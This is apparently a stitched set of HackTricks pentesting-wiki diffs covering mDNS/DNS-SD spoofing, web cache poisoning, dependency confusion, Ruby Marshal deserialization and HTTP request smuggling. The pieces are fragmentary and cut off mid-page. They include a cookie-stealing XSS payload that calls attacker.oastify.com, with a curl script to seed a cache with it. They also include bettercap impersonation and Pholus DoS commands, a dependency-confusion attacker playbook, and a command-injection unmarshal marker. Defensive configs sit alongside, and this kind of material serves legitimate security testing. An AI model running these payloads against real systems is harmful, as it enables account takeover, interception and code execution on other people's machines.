- [Deep Links & WebViews Exploitations Part II](https://medium.com/@justmobilesec/deep-links-webviews-exploitations-part-ii-5c0b118ec6f1)
- [Deep Links & WebViews Exploitations Part I](https://www.justmobilesec.com/en/blog/deep-links-webviews-exploitations-part-I)
- [Samsung S24 Exploit Chain Pwn2Own 2024 Walkthrough](https://medium.com/@happyjester80/samsung-s24-exploit-chain-pwn2own-2024-walkthrough-c7a3da9a7a26)
- [Pwn2Own Ireland 2024 Samsung S24 attack chain (whitepaper)](https://maliciouserection.com/2025/05/13/pwn2own-ireland-2024-samsung-s24-attack-chain-whitepaper.html)
- [Demonstration video](https://www.youtube.com/watch?v=LAIr2laU-So)
{{#include ../../banners/hacktricks-training.md}}

View File

@ -2,60 +2,146 @@
{{#include ../banners/hacktricks-training.md}}
## Basic Information
Multicast DNS (mDNS) enables DNS-like name resolution and service discovery inside a local link without a unicast DNS server. It uses UDP/5353 and the multicast addresses 224.0.0.251 (IPv4) and FF02::FB (IPv6). DNS Service Discovery (DNS-SD, typically used with mDNS) provides a standardized way to enumerate and describe services via PTR, SRV and TXT records.
```
PORT STATE SERVICE
5353/udp open zeroconf
```
### Operation of mDNS
In environments without a standard DNS server, mDNS lets devices resolve names ending in .local by querying the multicast address 224.0.0.251 (IPv4) or FF02::FB (IPv6). Key protocol details you'll often leverage during attacks:
- Names in the .local zone are resolved via mDNS; records carry a TTL indicating validity.
- QU (Query Unicast) bit may request unicast replies even for multicast questions.
- Implementations should ignore packets not sourced from the local link; some stacks still accept them.
- Probing/announcing enforces unique host/service names; interfering here creates DoS/“name squatting” conditions.
## DNS-SD service model
DNS-SD discovers services by querying PTR records that map service types to their instances. Services are identified as _<service>._tcp or _<service>._udp under .local, e.g. _ipp._tcp.local (printers), _airplay._tcp.local (AirPlay), _adb._tcp.local (Android Debug Bridge). Discover types with _services._dns-sd._udp.local, then resolve discovered instances to SRV/TXT/A/AAAA.
## Network Exploration and Enumeration
- nmap target scan (direct mDNS on a host):
```bash
nmap -sU -p 5353 --script=dns-service-discovery <target>
```
- nmap broadcast discovery (listen to the segment and enumerate all DNS-SD types/instances):
```bash
sudo nmap --script=broadcast-dns-service-discovery
```
- avahi-browse (Linux):
```bash
# List service types
avahi-browse -bt _services._dns-sd._udp
# Browse all services and resolve to host/port
avahi-browse -art
```
- Apple dns-sd (macOS):
```bash
# Browse all HTTP services
dns-sd -B _http._tcp
# Enumerate service types
dns-sd -B _services._dns-sd._udp
# Resolve a specific instance to SRV/TXT
dns-sd -L "My Printer" _ipp._tcp local
```
- Packet capture with tshark:
```bash
# Live capture
sudo tshark -i <iface> -f "udp port 5353" -Y mdns
# Only DNS-SD service list queries
sudo tshark -i <iface> -f "udp port 5353" -Y "dns.qry.name == \"_services._dns-sd._udp.local\""
```
#### **nmap Usage**
A useful command for scanning the local network for mDNS services is:
```bash
nmap -Pn -sUC -p5353 [target IP address]
```
This command helps identify open mDNS ports and the services advertised over them.
#### **Network Enumeration with Pholus**
To actively send mDNS requests and capture traffic, the **Pholus** tool can be utilized as follows:
```bash
sudo python3 pholus3.py [network interface] -rq -stimeout 10
```
Tip: Some browsers/WebRTC use ephemeral mDNS hostnames to mask local IPs. If you see random-UUID.local candidates on the wire, resolve them with mDNS to pivot to local IPs.
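A quick way to do that resolution (the UUID hostname below is a placeholder for whatever candidate you captured):
```bash
# Linux (avahi-utils)
avahi-resolve -n 1f2e3d4c-5b6a-7980-aabb-ccddeeff0011.local
# macOS
dns-sd -G v4v6 1f2e3d4c-5b6a-7980-aabb-ccddeeff0011.local
```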
## Attacks
### mDNS name probing interference (DoS / name squatting)
During the probing phase, a host checks name uniqueness. Responding with spoofed conflicts (suggesting that every candidate name is already taken) forces it to pick new names or fail, effectively blocking new devices from registering their services on the network.
Example with Pholus:
```bash
# Block new devices from taking names by auto-faking responses
sudo python3 pholus3.py <iface> -afre -stimeout 1000
```
### Service spoofing and impersonation (MitM)
Impersonate advertised DNS-SD services (printers, AirPlay, HTTP, file shares) to coerce clients into connecting to you. This is especially useful to:
- Capture documents by spoofing _ipp._tcp or _printer._tcp.
- Lure clients to HTTP/HTTPS services to harvest tokens/cookies or deliver payloads.
- Combine with NTLM relay techniques when Windows clients negotiate auth to spoofed services.
With bettercap's zerogod module (mDNS/DNS-SD spoofer/impersonator):
```bash
# Start mDNS/DNS-SD discovery
sudo bettercap -iface <iface> -eval "zerogod.discovery on"
# Show all services seen from a host
> zerogod.show 192.168.1.42
# Impersonate all services of a target host automatically
> zerogod.impersonate 192.168.1.42
# Save IPP print jobs to disk while impersonating a printer
> set zerogod.ipp.save_path ~/.bettercap/zerogod/documents/
> zerogod.impersonate 192.168.1.42
# Replay previously captured services
> zerogod.save 192.168.1.42 target.yml
> zerogod.advertise target.yml
```
Also see generic LLMNR/NBNS/mDNS/WPAD spoofing and credential capture/relay workflows:
{{#ref}}
../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md
{{#endref}}
### Notes on recent implementation issues (useful for DoS/persistence during engagements)
- Avahi reachable-assertion and D-Bus crash bugs (2023) can terminate avahi-daemon on Linux distributions (e.g. CVE-2023-38469..38473, CVE-2023-1981), disrupting service discovery on target hosts until restart.
- Cisco IOS XE Wireless LAN Controller mDNS gateway DoS (2024, CVE-2024-20303) allows adjacent attackers to drive high CPU and disconnect APs. If you encounter an mDNS gateway between VLANs, be aware of its stability under malformed or high-rate mDNS.
## Defensive considerations and OPSEC
- Segment boundaries: Dont route 224.0.0.251/FF02::FB between security zones unless an mDNS gateway is explicitly required. If you must bridge discovery, prefer allowlists and rate limits.
- Windows endpoints/servers:
- To hard-disable name resolution via mDNS set the registry value and reboot:
```
HKLM\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\EnableMDNS = 0 (DWORD)
```
- In managed environments, disable the built-in “mDNS (UDP-In)” Windows Defender Firewall rule (at least on the Domain profile) to prevent inbound mDNS processing while preserving home/roaming functionality.
- On newer Windows 11 builds/GPO templates, use the policy “Computer Configuration > Administrative Templates > Network > DNS Client > Configure multicast DNS (mDNS) protocol” and set it to Disabled.
- Linux (Avahi):
- Lock down publishing when not needed: set `disable-publishing=yes`, and restrict interfaces with `allow-interfaces=` / `deny-interfaces=` in `/etc/avahi/avahi-daemon.conf`.
- Consider `check-response-ttl=yes` and avoid `enable-reflector=yes` unless strictly required; prefer `reflect-filters=` allowlists when reflecting.
- macOS: Restrict inbound mDNS at host/network firewalls when Bonjour discovery is not needed for specific subnets.
- Monitoring: Alert on unusual surges in `_services._dns-sd._udp.local` queries or sudden changes in SRV/TXT of critical services; these are indicators of spoofing or service impersonation.
## Tooling quick reference
- nmap NSE: `dns-service-discovery` and `broadcast-dns-service-discovery`.
- Pholus: active scan, reverse mDNS sweeps, DoS and spoofing helpers.
```bash
# Passive sniff (timeout seconds)
sudo python3 pholus3.py <iface> -stimeout 60
# Enumerate service types
sudo python3 pholus3.py <iface> -sscan
# Send generic mDNS requests
sudo python3 pholus3.py <iface> --request
# Reverse mDNS sweep of a subnet
sudo python3 pholus3.py <iface> -rdns_scanning 192.168.2.0/24
```
- bettercap zerogod: discover, save, advertise, and impersonate mDNS/DNS-SD services (see examples above).
## Spoofing/MitM
The most interesting attack you can perform over this service is to perform a MitM in the communication between the client and the real server. You might be able to obtain sensitive files (MitM the communication with the printer) or even credentials (Windows authentication).\
For more information check:
@ -66,7 +152,8 @@ For more information check:
## References
- [Practical IoT Hacking: The Definitive Guide to Attacking the Internet of Things](https://books.google.co.uk/books/about/Practical_IoT_Hacking.html?id=GbYEEAAAQBAJ&redir_esc=y)
- [Nmap NSE: broadcast-dns-service-discovery](https://nmap.org/nsedoc/scripts/broadcast-dns-service-discovery.html)
- [bettercap zerogod (mDNS/DNS-SD discovery, spoofing, impersonation)](https://www.bettercap.org/modules/ethernet/zerogod/)
{{#include ../banners/hacktricks-training.md}}

View File

@ -176,6 +176,44 @@ The [Web Cache Vulnerability Scanner](https://github.com/Hackmanit/Web-Cache-Vul
Example usage: `wcvs -u example.com`
### Header-reflection XSS + CDN/WAF-assisted cache seeding (User-Agent, auto-cached .js)
This real-world pattern chains a header-based reflection primitive with CDN/WAF behavior to reliably poison the cached HTML served to other users:
- The main HTML reflected an untrusted request header (e.g., `User-Agent`) into executable context.
- The CDN stripped cache headers but an internal/origin cache existed. The CDN also auto-cached requests ending in static extensions (e.g., `.js`), while the WAF applied weaker content inspection to GETs for static assets.
- Request flow quirks allowed a request to a `.js` path to influence the cache key/variant used for the subsequent main HTML, enabling cross-user XSS via header reflection.
Practical recipe (observed across a popular CDN/WAF):
1) From a clean IP (avoid prior reputation-based downgrades), set a malicious `User-Agent` via browser or Burp Proxy Match & Replace.
2) In Burp Repeater, prepare a group of two requests and use "Send group in parallel" (single-packet mode works best):
- First request: GET a `.js` resource path on the same origin while sending your malicious `User-Agent`.
- Immediately after: GET the main page (`/`).
3) The CDN/WAF routing race plus the auto-cached `.js` often seeds a poisoned cached HTML variant that is then served to other visitors sharing the same cache key conditions (e.g., same `Vary` dimensions like `User-Agent`).
Example header payload (to exfiltrate non-HttpOnly cookies):
```
User-Agent: Mo00ozilla/5.0</script><script>new Image().src='https://attacker.oastify.com?a='+document.cookie</script>"
```
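A rough curl approximation of steps 1-3 (Burp's single-packet parallel send is more reliable for winning the race; `victim.tld` and the `.js` path are placeholders):
```bash
UA='Mo00ozilla/5.0</script><script>new Image().src="https://attacker.oastify.com?a="+document.cookie</script>"'
# Fire the auto-cached .js request and the main page nearly simultaneously from a clean IP
curl -s -A "$UA" 'https://victim.tld/static/app.js' -o /dev/null &
curl -s -A "$UA" 'https://victim.tld/' -o /dev/null &
wait
# From a different session/IP, check whether the poisoned variant got cached
curl -s 'https://victim.tld/' | grep -F 'oastify' && echo '[+] cache poisoned'
```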
Operational tips:
- Many CDNs hide cache headers; poisoning may appear only on multi-hour refresh cycles. Use multiple vantage IPs and throttle to avoid rate-limit or reputation triggers.
- Using an IP from the CDN's own cloud sometimes improves routing consistency.
- If a strict CSP is present, this still works if the reflection executes in main HTML context and CSP allows inline execution or is bypassed by context.
Impact:
- If session cookies arent `HttpOnly`, zero-click ATO is possible by mass-exfiltrating `document.cookie` from all users who are served the poisoned HTML.
Defenses:
- Stop reflecting request headers into HTML; strictly context-encode if unavoidable. Align CDN and origin cache policies and avoid varying on untrusted headers.
- Ensure WAF applies content inspection consistently to `.js` requests and static paths.
- Set `HttpOnly` (and `Secure`, `SameSite`) on session cookies.
## Vulnerable Examples
### Apache Traffic Server ([CVE-2021-27577](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27577))
@ -249,8 +287,9 @@ Learn here about how to perform[ Cache Deceptions attacks abusing HTTP Request S
- [https://youst.in/posts/cache-poisoning-at-scale/](https://youst.in/posts/cache-poisoning-at-scale/)
- [https://bxmbn.medium.com/how-i-test-for-web-cache-vulnerabilities-tips-and-tricks-9b138da08ff9](https://bxmbn.medium.com/how-i-test-for-web-cache-vulnerabilities-tips-and-tricks-9b138da08ff9)
- [https://www.linkedin.com/pulse/how-i-hacked-all-zendesk-sites-265000-site-one-line-abdalhfaz/](https://www.linkedin.com/pulse/how-i-hacked-all-zendesk-sites-265000-site-one-line-abdalhfaz/)
- [How I found a 0-Click Account takeover in a public BBP and leveraged it to access Admin-Level functionalities](https://hesar101.github.io/posts/How-I-found-a-0-Click-Account-takeover-in-a-public-BBP-and-leveraged-It-to-access-Admin-Level-functionalities/)
- [Burp Proxy Match & Replace](https://portswigger.net/burp/documentation/desktop/tools/proxy/match-and-replace)
{{#include ../../banners/hacktricks-training.md}}

View File

@ -5,44 +5,284 @@
## Basic Information
Dependency Confusion (a.k.a. substitution attacks) happens when a package manager resolves a dependency name from an unintended, less-trusted registry/source (usually a public registry) instead of the intended private/internal one. This typically leads to the installation of an attacker-controlled package.
Common root causes:
- Typosquatting/misspelling: Importing `reqests` instead of `requests` (resolves from public registry).
- Non-existent/abandoned internal package: Importing `company-logging` that no longer exists internally, so the resolver looks in public registries and finds an attackers package.
- Version preference across multiple registries: Importing an internal `company-requests` while the resolver is allowed to also query public registries and prefers the “best”/newer version published publicly by an attacker.
Key idea: If the resolver can see multiple registries for the same package name and is allowed to pick the "best" candidate globally, you're vulnerable unless you constrain resolution.
## Exploitation
> [!WARNING]
> In all cases, the attacker only needs to publish a malicious package with the same name as the dependency your build resolves from a public registry. Installation-time hooks (e.g., npm scripts) or import-time code paths often give code execution.
### Misspelled & Non-existent
If your project references a library that isn't available in the private registry, and your tooling falls back to a public registry, an attacker can seed a malicious package with that name in the public registry. Your runners/CI/dev machines will fetch and execute it.
### Unspecified Version / “Best-version” selection across indexes
Developers frequently leave versions unpinned or allow wide ranges. When a resolver is configured with both internal and public indexes, it may select the newest version regardless of source. For internal names like `requests-company`, if the internal index has `1.0.1` but an attacker publishes `1.0.2` to the public registry and your resolver considers both, the public package may win.
## AWS Fix
This vulnerability was found in AWS CodeArtifact (read the [details in this blog post](https://zego.engineering/dependency-confusion-in-aws-codeartifact-86b9ff68963d)). AWS added controls to mark dependencies/feeds as internal vs external so the client won't fetch "internal" names from upstream public registries.
## Finding Vulnerable Libraries
In the [original post about dependency confusion](https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610) the author looked for thousands of exposed manifests (e.g., `package.json`, `requirements.txt`, lockfiles) to infer internal package names and then published higher-versioned packages to public registries.
## Practical Attacker Playbook (for red teams in authorized tests)
- Enumerate names:
- Grep repos and CI configs for manifest/lock files and internal namespaces.
- Look for organization-specific prefixes (e.g., `@company/*`, `company-*`, internal groupIds, NuGet ID patterns, private module paths for Go, etc.).
- Check public registries for availability:
- If the name is unregistered publicly, register it; if it exists, attempt subdependency hijacking by targeting internal transitive names.
- Publish with precedence:
- Choose a semver that “wins” (e.g., a very high version) or matches resolver rules.
- Include minimal install-time execution where applicable (e.g., npm `preinstall`/`install`/`postinstall` scripts). For Python, prefer import-time execution paths, as wheels typically don't execute arbitrary code on install.
- Exfil control:
- Ensure outbound is allowed from CI to your controlled endpoint; otherwise use DNS queries or error messages as a side-channel to prove code execution.
> [!CAUTION]
> Always get written authorization, use unique package names/versions for the engagement, and immediately unpublish or coordinate cleanup when testing concludes.
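To triage harvested names quickly, a small helper is sketched below. The candidate names are hypothetical examples, and the sketch relies on the fact that the public npm and PyPI endpoints return 404 for unregistered names:
```python
#!/usr/bin/env python3
"""Check whether candidate internal package names are free on public
registries (npm and PyPI). CANDIDATES holds hypothetical examples."""
import requests

CANDIDATES = ["company-logging", "company-requests"]  # harvested from manifests

for name in CANDIDATES:
    npm = requests.get(f"https://registry.npmjs.org/{name}", timeout=10)
    pypi = requests.get(f"https://pypi.org/pypi/{name}/json", timeout=10)
    # A 404 means the name is unregistered and could be claimed (confusion candidate)
    print(f"{name}: "
          f"npm={'FREE' if npm.status_code == 404 else 'taken'} "
          f"pypi={'FREE' if pypi.status_code == 404 else 'taken'}")
```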
## Defender Playbook (what actually prevents confusion)
High-level strategies that work across ecosystems:
- Use unique internal namespaces and bind them to a single registry.
- Avoid mixing trust levels at resolution time. Prefer a single internal registry that proxies approved public packages instead of giving package managers both internal and public endpoints.
- For managers that support it, map packages to specific sources (no global “best-version” across registries).
- Pin and lock:
- Use lockfiles that record the resolved registry URLs (npm/yarn/pnpm) or use hash/attestation pinning (pip `--require-hashes`, Gradle dependency verification).
- Block public fallback for internal names at the registry/network layer.
- Reserve your internal names in public registries when feasible to prevent future squatting.
## Ecosystem Notes and Secure Config Snippets
Below are pragmatic, minimal configs to reduce or eliminate dependency confusion. Prefer enforcing these in CI and developer environments.
### JavaScript/TypeScript (npm, Yarn, pnpm)
- Use scoped packages for all internal code and pin the scope to your private registry.
- Keep installs immutable in CI (npm lockfile, `yarn install --immutable`).
.npmrc (project-level)
```ini
# Bind internal scope to private registry; do not allow public fallback for @company/*
@company:registry=https://registry.corp.example/npm/
# Always authenticate to the private registry
//registry.corp.example/npm/:_authToken=${NPM_TOKEN}
strict-ssl=true
```
package.json (for internal package)
```json
{
  "name": "@company/api-client",
  "version": "1.2.3",
  "private": false,
  "publishConfig": {
    "registry": "https://registry.corp.example/npm/",
    "access": "restricted"
  }
}
```
Yarn Berry (.yarnrc.yml)
```yaml
npmScopes:
  company:
    npmRegistryServer: "https://registry.corp.example/npm/"
    npmAlwaysAuth: true

# CI should fail if lockfile would change
enableImmutableInstalls: true
```
Operational tips:
- Only publish internal packages within the `@company` scope.
- For third-party packages, allow public registry via your private proxy/mirror, not directly from clients.
- Consider enabling npm package provenance for public packages you publish to increase traceability (it doesn't by itself prevent confusion).
### Python (pip / Poetry)
Core rule: Don't use `--extra-index-url` to mix trust levels. Either:
- Expose a single internal index that proxies and caches approved PyPI packages, or
- Use explicit index selection and hash pinning.
pip.conf
```ini
[global]
index-url = https://pypi.corp.example/simple
# Disallow source distributions when possible
only-binary = :all:
# Lock with hashes generated via pip-tools
require-hashes = true
```
Generate hashed requirements with pip-tools:
```bash
# From pyproject.toml or requirements.in
pip-compile --generate-hashes -o requirements.txt
pip install --require-hashes -r requirements.txt
```
If you must reach public PyPI, do it via your internal proxy and maintain an explicit allowlist there. Avoid `--extra-index-url` in CI.
### .NET (NuGet)
Use Package Source Mapping to tie package ID patterns to explicit sources and prevent resolution from unexpected feeds.
nuget.config
```xml
<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <packageSources>
    <clear />
    <add key="nuget.org" value="https://api.nuget.org/v3/index.json" />
    <add key="corp" value="https://nuget.corp.example/v3/index.json" />
  </packageSources>
  <packageSourceMapping>
    <packageSource key="nuget.org">
      <package pattern="*" />
    </packageSource>
    <packageSource key="corp">
      <package pattern="Company.*" />
      <package pattern="Internal.Utilities" />
    </packageSource>
  </packageSourceMapping>
</configuration>
```
### Java (Maven/Gradle)
Maven settings.xml (mirror all to internal; disallow ad-hoc repos in POMs via Enforcer):
```xml
<settings>
  <mirrors>
    <mirror>
      <id>internal-mirror</id>
      <mirrorOf>*</mirrorOf>
      <url>https://maven.corp.example/repository/group</url>
    </mirror>
  </mirrors>
</settings>
```
Add Enforcer to ban repositories declared in POMs and force usage of your mirror:
```xml
<plugin>
  <groupId>org.apache.maven.plugins</groupId>
  <artifactId>maven-enforcer-plugin</artifactId>
  <version>3.6.1</version>
  <executions>
    <execution>
      <id>enforce-no-repositories</id>
      <goals><goal>enforce</goal></goals>
      <configuration>
        <rules>
          <requireNoRepositories />
        </rules>
      </configuration>
    </execution>
  </executions>
</plugin>
```
Gradle: Centralize and lock dependencies.
- Enforce repositories in `settings.gradle(.kts)` only:
```kotlin
dependencyResolutionManagement {
    repositoriesMode = RepositoriesMode.FAIL_ON_PROJECT_REPOS
    repositories {
        maven { url = uri("https://maven.corp.example/repository/group") }
    }
}
```
- Enable dependency verification (checksums/signatures) and commit `gradle/verification-metadata.xml`.
### Go Modules
Configure private modules so the public proxy and checksum DB aren't used for them.
```bash
# Use corporate proxy first, then public proxy as fallback
export GOPROXY=https://goproxy.corp.example,https://proxy.golang.org
# Mark private paths to skip proxy and checksum db
export GOPRIVATE=*.corp.example.com,github.com/your-org/*
export GONOSUMDB=*.corp.example.com,github.com/your-org/*
```
### Rust (Cargo)
Replace crates.io with an approved internal mirror or vendor directory for builds; do not allow arbitrary public fallback.
.cargo/config.toml
```toml
[source.crates-io]
replace-with = "corp-mirror"

[source.corp-mirror]
registry = "https://crates-mirror.corp.example/index"
```
For publishing, be explicit with `--registry` and keep credentials scoped to the target registry.
### Ruby (Bundler)
Use source blocks and disable multisource Gemfiles so gems come only from the intended repository.
Gemfile
```ruby
source "https://gems.corp.example"

source "https://rubygems.org" do
  gem "rails"
  gem "pg"
end

source "https://gems.corp.example" do
  gem "company-logging"
end
```
Enforce at config level:
```bash
bundle config set disable_multisource true
```
## CI/CD and Registry Controls That Help
- Private registry as a single ingress:
- Use Artifactory/Nexus/CodeArtifact/GitHub Packages/Azure Artifacts as the only endpoint developers/CI can reach.
- Implement block/allow rules so internal namespaces never resolve from upstream public sources.
- Lockfiles are immutable in CI:
- npm: commit `package-lock.json`, use `npm ci`.
- Yarn: commit `yarn.lock`, use `yarn install --immutable`.
- Python: commit hashed `requirements.txt`, enforce `--require-hashes`.
- Gradle: commit `verification-metadata.xml` and fail on unknown artifacts.
- Outbound egress control: block direct access from CI to public registries except via the approved proxy.
- Name reservation: pre-register your internal names/namespaces in public registries where supported.
- Package provenance / attestations: when publishing public packages, enable provenance/attestations to make tampering more detectable downstream.
## References
- [https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610](https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610)
- [https://zego.engineering/dependency-confusion-in-aws-codeartifact-86b9ff68963d](https://zego.engineering/dependency-confusion-in-aws-codeartifact-86b9ff68963d)
- [https://learn.microsoft.com/en-us/nuget/consume-packages/package-source-mapping](https://learn.microsoft.com/en-us/nuget/consume-packages/package-source-mapping)
- [https://yarnpkg.com/configuration/yarnrc/](https://yarnpkg.com/configuration/yarnrc/)
{{#include ../banners/hacktricks-training.md}}

Using the arbitrary file write vulnerability, the attacker writes the crafted cache file to the computed location. Next, they trigger a server restart (by writing to tmp/restart.txt, which is monitored by Puma). During restart, when Rails requires the targeted file, the malicious cache file is loaded, resulting in remote code execution (RCE).
### Ruby Marshal exploitation in practice (updated)
Treat any path where untrusted bytes reach `Marshal.load`/`marshal_load` as an RCE sink. Marshal reconstructs arbitrary object graphs and triggers library/gem callbacks during materialization.
- Minimal vulnerable Rails code path:
```ruby
class UserRestoreController < ApplicationController
  def show
    user_data = params[:data]

    if user_data.present?
      deserialized_user = Marshal.load(Base64.decode64(user_data))
      render plain: "OK: #{deserialized_user.inspect}"
    else
      render plain: "No data", status: :bad_request
    end
  end
end
```
- Common gadget classes seen in real chains: `Gem::SpecFetcher`, `Gem::Version`, `Gem::RequestSet::Lockfile`, `Gem::Resolver::GitSpecification`, `Gem::Source::Git`.
- Typical side-effect marker embedded in payloads (executed during unmarshal):
```
*-TmTT="$(id>/tmp/marshal-poc)"any.zip
```
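A delivery sketch for the vulnerable controller above. The route name and the pre-generated `marshal_payload.bin` are assumptions; the gadget chain itself must be built with a Ruby generator matching the target's gem/Ruby versions:
```python
# Send a pre-built Marshal gadget chain to the vulnerable `show` action.
import base64
import requests

payload = open("marshal_payload.bin", "rb").read()  # produced out-of-band
data = base64.b64encode(payload).decode()

# Hypothetical route for UserRestoreController#show
r = requests.get("https://target.example/user_restore", params={"data": data})
print(r.status_code, r.text[:200])
```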
Where it surfaces in real apps:
- Rails cache stores and session stores historically using Marshal
- Background job backends and file-backed object stores
- Any custom persistence or transport of binary object blobs
Industrialized gadget discovery:
- Grep for constructors, `hash`, `_load`, `init_with`, or side-effectful methods invoked during unmarshal
- Use CodeQL's Ruby unsafe deserialization queries to trace sources → sinks and surface gadgets
- Validate with public multi-format PoCs (JSON/XML/YAML/Marshal)
## References
- Trail of Bits - Marshal madness: A brief history of Ruby deserialization exploits: https://blog.trailofbits.com/2025/08/20/marshal-madness-a-brief-history-of-ruby-deserialization-exploits/
- elttam - Ruby 2.x Universal RCE Deserialization Gadget Chain: https://www.elttam.com/blog/ruby-deserialization/
- Phrack #69 - Rails 3/4 Marshal chain: https://phrack.org/issues/69/12.html
- CVE-2019-5420 (Rails 5.2 insecure deserialization): https://nvd.nist.gov/vuln/detail/CVE-2019-5420
- ZDI - RCE via Ruby on Rails Active Storage insecure deserialization: https://www.zerodayinitiative.com/blog/2019/6/20/remote-code-execution-via-ruby-on-rails-active-storage-insecure-deserialization
- Include Security - Discovering gadget chains in Rubyland: https://blog.includesecurity.com/2024/03/discovering-deserialization-gadget-chains-in-rubyland/
- GitHub Security Lab - Ruby unsafe deserialization (query help): https://codeql.github.com/codeql-query-help/ruby/rb-unsafe-deserialization/
- GitHub Security Lab - PoCs repo: https://github.com/GitHubSecurityLab/ruby-unsafe-deserialization
- Doyensec PR - Ruby 3.4 gadget: https://github.com/GitHubSecurityLab/ruby-unsafe-deserialization/pull/1
- Luke Jahnke - Ruby 3.4 universal chain: https://nastystereo.com/security/ruby-3.4-deserialization.html
- Luke Jahnke - Gem::SafeMarshal escape: https://nastystereo.com/security/ruby-safe-marshal-escape.html
- Ruby 3.4.0-rc1 release: https://github.com/ruby/ruby/releases/tag/v3_4_0_rc1
- Ruby fix PR #12444: https://github.com/ruby/ruby/pull/12444
- Trail of Bits - Auditing RubyGems.org (Marshal findings): https://blog.trailofbits.com/2024/12/11/auditing-the-ruby-ecosystems-central-package-repository/
{{#include ../../banners/hacktricks-training.md}}

When testing for request smuggling vulnerabilities by interfering with other requests, keep the following in mind:
- **Load Balancing Challenges:** Front-end servers acting as load balancers may distribute requests across various back-end systems. If the "attack" and "normal" requests end up on different systems, the attack won't succeed. This load balancing aspect may require several attempts to confirm a vulnerability.
- **Unintended User Impact:** If your attack inadvertently impacts another user's request (not the "normal" request you sent for detection), this indicates your attack influenced another application user. Continuous testing could disrupt other users, mandating a cautious approach.
## Distinguishing HTTP/1.1 pipelining artifacts vs genuine request smuggling
Connection reuse (keep-alive) and pipelining can easily produce illusions of "smuggling" in testing tools that send multiple requests on the same socket. Learn to separate harmless client-side artifacts from real server-side desync.
### Why pipelining creates classic false positives
HTTP/1.1 reuses a single TCP/TLS connection and concatenates requests and responses on the same stream. In pipelining, the client sends multiple requests back-to-back and relies on in-order responses. A common false-positive is to resend a malformed CL.0-style payload twice on a single connection:
```http
POST / HTTP/1.1
Host: hackxor.net
Content_Length: 47

GET /robots.txt HTTP/1.1
X: Y
```
Responses may look like:
```http
HTTP/1.1 200 OK
Content-Type: text/html
```
```http
HTTP/1.1 200 OK
Content-Type: text/plain

User-agent: *
Disallow: /settings
```
If the server ignored the malformed `Content_Length`, there is no FE↔BE desync. With reuse, your client actually sent this byte-stream, which the server parsed as two independent requests:
```http
POST / HTTP/1.1
Host: hackxor.net
Content_Length: 47

GET /robots.txt HTTP/1.1
X: YPOST / HTTP/1.1
Host: hackxor.net
Content_Length: 47

GET /robots.txt HTTP/1.1
X: Y
```
Impact: none. You just desynced your client from the server framing.
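You can reproduce this artifact outside Burp with a raw socket; a sketch follows, using the example target above. Sending the block twice on one connection yields four status lines; one block per connection yields two:
```python
# Demonstrate the client-side pipelining artifact with a raw socket.
import socket

req = (b"POST / HTTP/1.1\r\n"
       b"Host: hackxor.net\r\n"
       b"Content_Length: 47\r\n"   # underscore -> not a valid CL header, ignored
       b"\r\n"
       b"GET /robots.txt HTTP/1.1\r\n"
       b"X: Y\r\n"
       b"\r\n")

s = socket.create_connection(("hackxor.net", 80))
s.sendall(req + req)   # two copies pipelined on the same byte-stream
s.settimeout(3)

buf = b""
try:
    while chunk := s.recv(4096):
        buf += chunk
except socket.timeout:
    pass
s.close()

# Four "HTTP/1.1" status lines => the server parsed four independent requests
print(buf.decode(errors="replace"))
print("responses seen:", buf.count(b"HTTP/1.1 "))
```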
> [!TIP]
> Burp modules that depend on reuse/pipelining: Turbo Intruder with `requestsPerConnection>1`, Intruder with "HTTP/1 connection reuse", Repeater "Send group in sequence (single connection)" or "Enable connection reuse".
### Litmus tests: pipelining or real desync?
1. Disable reuse and re-test
- In Burp Intruder/Repeater, turn off HTTP/1 reuse and avoid "Send group in sequence".
- In Turbo Intruder, set `requestsPerConnection=1` and `pipeline=False`.
- If the behavior disappears, it was likely client-side pipelining, unless you're dealing with connection-locked/stateful targets or client-side desync.
2. HTTP/2 nested-response check
- Send an HTTP/2 request. If the response body contains a complete nested HTTP/1 response, you've proven a backend parsing/desync bug instead of a pure client artifact.
3. Partial-requests probe for connection-locked front-ends
- Some FEs only reuse the upstream BE connection if the client reused theirs. Use partial-requests to detect FE behavior that mirrors client reuse.
- See PortSwigger "Browser-Powered Desync Attacks" for the connection-locked technique.
4. State probes
- Look for first- vs subsequent-request differences on the same TCP connection (first-request routing/validation).
- Burp "HTTP Request Smuggler" includes a connectionstate probe that automates this.
5. Visualize the wire
- Use the Burp "HTTP Hacker" extension to inspect concatenation and message framing directly while experimenting with reuse and partial requests.
### Connection-locked request smuggling (reuse-required)
Some front-ends only reuse the upstream connection when the client reuses theirs. Real smuggling exists but is conditional on client-side reuse. To distinguish and prove impact:
- Prove the server-side bug
- Use the HTTP/2 nested-response check, or
- Use partial-requests to show the FE only reuses upstream when the client does.
- Show real impact even if direct cross-user socket abuse is blocked:
- Cache poisoning: poison shared caches via the desync so responses affect other users.
- Internal header disclosure: reflect FE-injected headers (e.g., auth/trust headers) and pivot to auth bypass.
- Bypass FE controls: smuggle restricted paths/methods past the front-end.
- Host-header abuse: combine with host routing quirks to pivot to internal vhosts.
- Operator workflow
- Reproduce with controlled reuse (Turbo Intruder `requestsPerConnection=2`, or Burp Repeater tab group → "Send group in sequence (single connection)").
- Then chain to cache/header-leak/control-bypass primitives and demonstrate cross-user or authorization impact.
> See also connection-state attacks, which are closely related but not technically smuggling:
>
>{{#ref}}
>../http-connection-request-smuggling.md
>{{#endref}}
### Client-side desync constraints
If you're targeting browser-powered/client-side desync, the malicious request must be sendable by a browser cross-origin. Header obfuscation tricks won't work. Focus on primitives reachable via navigation/fetch, and then pivot to cache poisoning, header disclosure, or front-end control bypass where downstream components reflect or cache responses.
For background and end-to-end workflows:
{{#ref}}
browser-http-request-smuggling.md
{{#endref}}
### Tooling to help decide
- HTTP Hacker (Burp BApp Store): exposes low-level HTTP behavior and socket concatenation.
- "Smuggling or pipelining?" Burp Repeater Custom Action: https://github.com/PortSwigger/bambdas/blob/main/CustomAction/SmugglingOrPipelining.bambda
- Turbo Intruder: precise control over connection reuse via `requestsPerConnection`.
- Burp HTTP Request Smuggler: includes a connection-state probe to spot first-request routing/validation.
> [!NOTE]
